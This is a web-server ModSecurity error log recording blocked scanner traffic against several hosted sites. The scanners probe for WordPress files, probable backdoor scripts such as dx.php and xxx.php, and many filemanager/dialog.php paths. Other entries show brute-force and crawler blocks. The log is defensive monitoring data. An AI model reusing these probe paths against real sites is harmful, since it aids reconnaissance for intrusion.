[Tue May 26 20:01:18.269727 2026] [security2:error] [pid 113091:tid 113223] [client 103.163.220.40:58857] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/preformatted/"] [unique_id "ahWutqPxBGSmlFNOy6pBZgAAAhY"]
[Tue May 26 20:01:18.460364 2026] [security2:error] [pid 106517:tid 106756] [client 178.238.226.119:55489] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/admin/ckeditor/filemanager/dialog.php"] [unique_id "ahWutoZZc2DoU1lPnP1vuwAAAO4"]
[Tue May 26 20:01:18.774601 2026] [security2:error] [pid 113091:tid 113277] [client 103.163.220.20:53645] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/classwithtostring.php"] [unique_id "ahWutqPxBGSmlFNOy6pBeQAAAkw"]
[Tue May 26 20:01:19.132097 2026] [security2:error] [pid 113091:tid 113317] [client 178.238.226.119:64712] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/admin/plugins/filemanager/dialog.php"] [unique_id "ahWut6PxBGSmlFNOy6pBgAAAAnQ"]
[Tue May 26 20:01:19.265512 2026] [security2:error] [pid 106517:tid 106750] [client 103.125.146.82:54369] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/user.php"] [unique_id "ahWut4ZZc2DoU1lPnP1v1gAAAOg"]
[Tue May 26 20:01:19.361668 2026] [security2:error] [pid 113091:tid 113294] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWutqPxBGSmlFNOy6pBfQAAAl0"]
[Tue May 26 20:01:19.697840 2026] [security2:error] [pid 106517:tid 106737] [client 178.238.226.119:51013] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/admin/global/plugins/filemanager/dialog.php"] [unique_id "ahWut4ZZc2DoU1lPnP1v7AAAANs"]
[Tue May 26 20:01:19.959325 2026] [security2:error] [pid 112029:tid 112175] [client 103.163.220.16:64325] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/js/jcrop/Jcrop.php"] [unique_id "ahWut6FW0C-ajaCsyFc-wQAAARo"]
[Tue May 26 20:01:20.078790 2026] [security2:error] [pid 113091:tid 113286] [client 49.42.32.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWut6PxBGSmlFNOy6pBhQAAAlU"]
[Tue May 26 20:01:20.384808 2026] [security2:error] [pid 106517:tid 106654] [client 178.238.226.119:53443] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/admin/js/plugins/filemanager/dialog.php"] [unique_id "ahWuuIZZc2DoU1lPnP1wDQAAAIk"]
[Tue May 26 20:01:20.464362 2026] [security2:error] [pid 106517:tid 106736] [client 103.163.220.25:64011] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/module.php"] [unique_id "ahWuuIZZc2DoU1lPnP1wEgAAANo"]
[Tue May 26 20:01:20.965854 2026] [security2:error] [pid 113091:tid 113320] [client 103.163.220.50:33565] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/about.php"] [unique_id "ahWuuKPxBGSmlFNOy6pBoQAAAnc"]
[Tue May 26 20:01:21.028966 2026] [security2:error] [pid 106517:tid 106661] [client 178.238.226.119:54604] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/backend/filemanager/dialog.php"] [unique_id "ahWuuYZZc2DoU1lPnP1wKAAAAJA"]
[Tue May 26 20:01:21.461394 2026] [security2:error] [pid 113091:tid 113340] [client 103.163.220.54:33167] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/dx.php"] [unique_id "ahWuuaPxBGSmlFNOy6pBrQAAAos"]
[Tue May 26 20:01:21.496822 2026] [security2:error] [pid 113091:tid 113337] [client 178.238.226.119:55224] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/ckeditor/filemanager/dialog.php"] [unique_id "ahWuuaPxBGSmlFNOy6pBrgAAAog"]
[Tue May 26 20:01:21.681931 2026] [security2:error] [pid 113091:tid 113229] [client 114.119.152.204:28311] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.chettinadavenue.com"] [uri "/ooty-website-refund.php"] [unique_id "ahWuuaPxBGSmlFNOy6pBtAAAAhw"], referer: https://www.chettinadavenue.com/
[Tue May 26 20:01:21.965400 2026] [security2:error] [pid 113091:tid 113243] [client 103.163.220.40:31499] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/missing/"] [unique_id "ahWuuaPxBGSmlFNOy6pBuAAAAio"]
[Tue May 26 20:01:21.991086 2026] [security2:error] [pid 106517:tid 106683] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuuYZZc2DoU1lPnP1wMgAAAKU"]
[Tue May 26 20:01:22.107714 2026] [security2:error] [pid 113091:tid 113259] [client 178.238.226.119:56303] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/editor/filemanager/dialog.php"] [unique_id "ahWuuqPxBGSmlFNOy6pBugAAAjo"]
[Tue May 26 20:01:22.146907 2026] [security2:error] [pid 106517:tid 106531] [remote 91.134.89.60:46478] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 60.89.134.91.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWuuYZZc2DoU1lPnP1wRgAAngs"]
[Tue May 26 20:01:22.467081 2026] [security2:error] [pid 106517:tid 106718] [client 103.163.220.44:56197] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-signin.php"] [unique_id "ahWuuoZZc2DoU1lPnP1wVAAAAMg"]
[Tue May 26 20:01:22.631674 2026] [security2:error] [pid 106517:tid 106768] [client 178.238.226.119:57104] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/editor/admin/filemanager/dialog.php"] [unique_id "ahWuuoZZc2DoU1lPnP1wWgAAAPo"]
[Tue May 26 20:01:22.979804 2026] [security2:error] [pid 113091:tid 113258] [client 103.163.220.11:61741] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/buy.php"] [unique_id "ahWuuqPxBGSmlFNOy6pBwQAAAjk"]
[Tue May 26 20:01:23.053571 2026] [security2:error] [pid 112029:tid 112053] [remote 114.119.141.203:0] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.stockmarketanalysis.in"] [uri "/base-metal-tips.php"] [unique_id "ahWuu6FW0C-ajaCsyFc-ywABWhc"], referer: https://www.stockmarketanalysis.in/bullion-tips.php
[Tue May 26 20:01:23.384910 2026] [security2:error] [pid 113091:tid 113272] [client 178.238.226.119:59890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/global/plugins/filemanager/dialog.php"] [unique_id "ahWuu6PxBGSmlFNOy6pBywAAAkc"]
[Tue May 26 20:01:23.470728 2026] [security2:error] [pid 106517:tid 106672] [client 103.163.220.33:25837] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentyfour/patterns/template-singl-portfolio.php"] [unique_id "ahWuu4ZZc2DoU1lPnP1wfAAAAJs"]
[Tue May 26 20:01:23.944103 2026] [security2:error] [pid 113091:tid 113264] [client 178.238.226.119:51012] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/js/filemanager/dialog.php"] [unique_id "ahWuu6PxBGSmlFNOy6pBzwAAAj8"]
[Tue May 26 20:01:23.977080 2026] [security2:error] [pid 113091:tid 113328] [client 103.163.220.8:23105] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/news-portal/user-install.php"] [unique_id "ahWuu6PxBGSmlFNOy6pB0AAAAn8"]
[Tue May 26 20:01:24.403155 2026] [security2:error] [pid 106517:tid 106769] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuu4ZZc2DoU1lPnP1wlAAAAPs"]
[Tue May 26 20:01:24.472653 2026] [security2:error] [pid 106517:tid 106713] [client 103.163.220.19:44697] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/system_core.php"] [unique_id "ahWuvIZZc2DoU1lPnP1wpgAAAMM"]
[Tue May 26 20:01:24.480445 2026] [security2:error] [pid 112029:tid 112271] [client 178.238.226.119:53625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/js/tiny_mce/filemanager/dialog.php"] [unique_id "ahWuvKFW0C-ajaCsyFc-2gAAAXo"]
[Tue May 26 20:01:24.659174 2026] [security2:error] [pid 106517:tid 106726] [client 106.222.227.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWuvIZZc2DoU1lPnP1wrQAAANA"]
[Tue May 26 20:01:24.659735 2026] [security2:error] [pid 113091:tid 113293] [client 106.222.227.168:3293] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "samayikprasanga.in"] [uri "/epaper.php"] [unique_id "ahWuvKPxBGSmlFNOy6pB1QAAAlw"]
[Tue May 26 20:01:24.975057 2026] [security2:error] [pid 106517:tid 106712] [client 103.163.220.51:47625] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/admin.php"] [unique_id "ahWuvIZZc2DoU1lPnP1wvQAAAMI"]
[Tue May 26 20:01:25.124509 2026] [security2:error] [pid 106517:tid 106710] [client 178.238.226.119:55896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/js/tinymce/filemanager/dialog.php"] [unique_id "ahWuvYZZc2DoU1lPnP1wwQAAAMA"]
[Tue May 26 20:01:25.463556 2026] [security2:error] [pid 112029:tid 112205] [client 103.163.220.47:61193] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/chosen.php"] [unique_id "ahWuvaFW0C-ajaCsyFc-3QAAATg"]
[Tue May 26 20:01:25.685364 2026] [security2:error] [pid 106517:tid 106760] [client 178.238.226.119:57150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/js/tinymce/plugins/filemanager/dialog.php"] [unique_id "ahWuvYZZc2DoU1lPnP1w1QAAAPI"]
[Tue May 26 20:01:25.966418 2026] [security2:error] [pid 106517:tid 106677] [client 103.163.220.13:60601] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/images/media/"] [unique_id "ahWuvYZZc2DoU1lPnP1w5QAAAKA"]
[Tue May 26 20:01:26.174680 2026] [security2:error] [pid 106517:tid 106700] [client 178.238.226.119:58548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/plugins/filemanager/dialog.php"] [unique_id "ahWuvoZZc2DoU1lPnP1w7gAAALY"]
[Tue May 26 20:01:26.466638 2026] [security2:error] [pid 106517:tid 106712] [client 103.163.220.39:39641] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/config.php"] [unique_id "ahWuvoZZc2DoU1lPnP1w-AAAAMI"]
[Tue May 26 20:01:26.700334 2026] [security2:error] [pid 112029:tid 112243] [client 178.238.226.119:58825] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/scripts/filemanager/dialog.php"] [unique_id "ahWuvqFW0C-ajaCsyFc-6gAAAV4"]
[Tue May 26 20:01:26.865334 2026] [security2:error] [pid 106517:tid 106758] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuvoZZc2DoU1lPnP1w9gAAAPA"]
[Tue May 26 20:01:26.962485 2026] [security2:error] [pid 106517:tid 106670] [client 103.163.220.34:45219] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/freeform/"] [unique_id "ahWuvoZZc2DoU1lPnP1xCQAAAJk"]
[Tue May 26 20:01:27.254308 2026] [security2:error] [pid 113091:tid 113308] [client 178.238.226.119:60035] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/scripts/ckeditor/filemanager/dialog.php"] [unique_id "ahWuv6PxBGSmlFNOy6pB6AAAAms"]
[Tue May 26 20:01:27.464079 2026] [security2:error] [pid 113091:tid 113275] [client 103.163.220.29:24507] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/button/"] [unique_id "ahWuv6PxBGSmlFNOy6pB7AAAAko"]
[Tue May 26 20:01:27.780100 2026] [security2:error] [pid 106517:tid 106721] [client 178.238.226.119:60882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/javascript/filemanager/dialog.php"] [unique_id "ahWuv4ZZc2DoU1lPnP1xKAAAAMs"]
[Tue May 26 20:01:27.800916 2026] [security2:error] [pid 106517:tid 106523] [remote 216.73.216.30:17326] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWuv4ZZc2DoU1lPnP1xKQAAnAM"]
[Tue May 26 20:01:27.979938 2026] [security2:error] [pid 113091:tid 113301] [client 103.163.220.25:38187] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/login.php"] [unique_id "ahWuv6PxBGSmlFNOy6pB8wAAAmQ"]
[Tue May 26 20:01:28.185950 2026] [security2:error] [pid 113091:tid 113327] [client 151.245.177.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWuwKPxBGSmlFNOy6pB-QAAAn4"], referer: https://www.anujtradingco.com/
[Tue May 26 20:01:28.372416 2026] [security2:error] [pid 106517:tid 106656] [client 178.238.226.119:62064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/js/plugins/filemanager/dialog.php"] [unique_id "ahWuwIZZc2DoU1lPnP1xNAAAAIs"]
[Tue May 26 20:01:28.476750 2026] [security2:error] [pid 106517:tid 106773] [client 103.163.220.13:56723] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/database.php"] [unique_id "ahWuwIZZc2DoU1lPnP1xPQAAAP8"]
[Tue May 26 20:01:28.892639 2026] [security2:error] [pid 113091:tid 113293] [client 178.238.226.119:49427] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/plugins/js/filemanager/dialog.php"] [unique_id "ahWuwKPxBGSmlFNOy6pCDAAAAlw"]
[Tue May 26 20:01:28.972513 2026] [security2:error] [pid 106517:tid 106692] [client 103.163.220.50:53441] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/colors/ectoplasm/"] [unique_id "ahWuwIZZc2DoU1lPnP1xSwAAAK4"]
[Tue May 26 20:01:29.030055 2026] [security2:error] [pid 113091:tid 113313] [client 151.245.177.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWuwKPxBGSmlFNOy6pCDwAAAnA"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460402&moderation-hash=8d32f41f770ff28778c39c05f8a56237
[Tue May 26 20:01:29.466120 2026] [security2:error] [pid 113091:tid 113223] [client 103.125.146.82:27695] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/xxx.php"] [unique_id "ahWuwaPxBGSmlFNOy6pCGAAAAhY"]
[Tue May 26 20:01:29.475063 2026] [security2:error] [pid 113091:tid 113330] [client 178.238.226.119:53352] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/plugins/ckeditor/filemanager/dialog.php"] [unique_id "ahWuwaPxBGSmlFNOy6pCGQAAAoE"]
[Tue May 26 20:01:29.968145 2026] [security2:error] [pid 106517:tid 106696] [client 103.163.220.21:63639] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/blocks/gallery/"] [unique_id "ahWuwYZZc2DoU1lPnP1xaAAAALI"]
[Tue May 26 20:01:29.984860 2026] [security2:error] [pid 113091:tid 113348] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuwaPxBGSmlFNOy6pCGwAAApM"]
[Tue May 26 20:01:30.042561 2026] [security2:error] [pid 113091:tid 113243] [client 178.238.226.119:56987] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.226.238.178.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/assets/plugins/ckeditor/plugins/filemanager/dialog.php"] [unique_id "ahWuwqPxBGSmlFNOy6pCKgAAAio"]
[Tue May 26 20:01:30.073393 2026] [security2:error] [pid 113091:tid 113255] [client 47.128.46.62:43864] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/debats-cicodev"] [unique_id "ahWuwqPxBGSmlFNOy6pCKwAAAjY"]
